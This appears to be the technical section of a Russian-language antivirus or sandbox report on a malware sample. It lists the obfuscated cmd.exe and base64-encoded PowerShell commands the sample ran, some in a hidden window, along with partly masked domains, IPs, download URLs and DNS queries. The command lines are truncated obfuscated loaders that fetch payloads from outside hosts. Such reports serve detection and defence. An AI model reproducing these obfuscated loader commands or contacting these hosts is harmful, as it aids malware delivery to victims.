Техническая информация
- '<SYSTEM32>\cmd.exe' %comspec% /v /c set %WbEvociZv%=wer^s&&set %pXiNMZbzf%=wfAafluqi&&set %bpDNKqTAR%=p^o&&set %iIHaFzaBm%=ccpKuIMsC&&set %uuijYbmzi%=hel^l&&set %ROJKKpcjv%=zKfUwwPSX&&!%bpDNKqTAR%!!...
- 'sf###arms.com':80
- 'le###rschool.cn':80
- '45.##4.12.226':80
- 'rs####mation.com':80
- 'rs####mation.com':443
- http://le###rschool.cn/X/
- http://45.##4.12.226/?do####################
- http://www.rs####mation.com/DCpuzltyM/
- 'rs####mation.com':443
- DNS ASK sf###arms.com
- DNS ASK of######allbrowsmatter.com
- DNS ASK le###rschool.cn
- DNS ASK rs####mation.com
- DNS ASK pa####ankipower.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc "IAAmACgAIAAkAHAAcwBIAE8AbQBlAFsAMgAxAF0AKwAkAFAAcwBoAG8ATQBlAFsAMwAwAF0AKwAnAHgAJwApACAAKAAtAEoATwBJAG4AIAAoACAAKAAgADQANAAgACwAIAAxADYANwAsACAAMQA2ADMAIAAsACAAMQA0ADMALAAxADYAMgAgACwAIAA...
- '<SYSTEM32>\cmd.exe' %comspec% /v /c set %WbEvociZv%=wer^s&&set %pXiNMZbzf%=wfAafluqi&&set %bpDNKqTAR%=p^o&&set %iIHaFzaBm%=ccpKuIMsC&&set %uuijYbmzi%=hel^l&&set %ROJKKpcjv%=zKfUwwPSX&&!%bpDNKqTAR%!!... (со скрытым окном)